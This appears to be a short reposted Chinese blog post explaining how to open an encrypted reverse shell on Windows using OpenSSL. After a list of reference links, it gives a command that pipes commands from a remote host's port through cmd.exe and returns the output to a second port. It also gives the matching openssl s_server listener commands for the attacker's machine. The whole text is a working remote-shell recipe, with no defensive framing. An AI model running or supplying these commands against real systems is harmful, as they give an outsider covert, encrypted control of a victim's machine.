Windows下使用Openssl加密反弹SHELL
作者:互联网
Windows下使用Openssl加密反弹SHELL
参考链接:
https://xax007.github.io/2019-03-07-reverse-encrypted-shell-with-openssl/
https://www.madboa.com/geek/openssl/
https://superhero.ninja/2015/07/22/create-a-simple-https-server-with-openssl-s_server/
https://blog.inequationgroup.com/openssl-nc/
https://www.cnblogs.com/heycomputer/articles/10697865.html
操作命令
openssl s_client -quiet -connect [ip]:[port1] | cmd.exe | openssl s_client -quiet -connect [ip]:[port2]
以上命令会从 [ip]:[port1] 获取命令发送给 cmd.exe执行,然后把结果返回到 [ip]:[port2]
因此在本机需要启动两个 s_server从 port1 发送命令到 cmd
从 port1 发送命令到 cmd
openssl s_server -quiet -key [keyfile] -cert [cert] -port [port1]
从 port2 获取发送给 port1 的命令执行结果
openssl s_server -quiet -key [keyfile] -cert [cert] -port [port2]
标签:SHELL,Windows,ip,Openssl,openssl,quiet,https,server,port1 来源: https://www.cnblogs.com/0xd3ac/p/12130998.html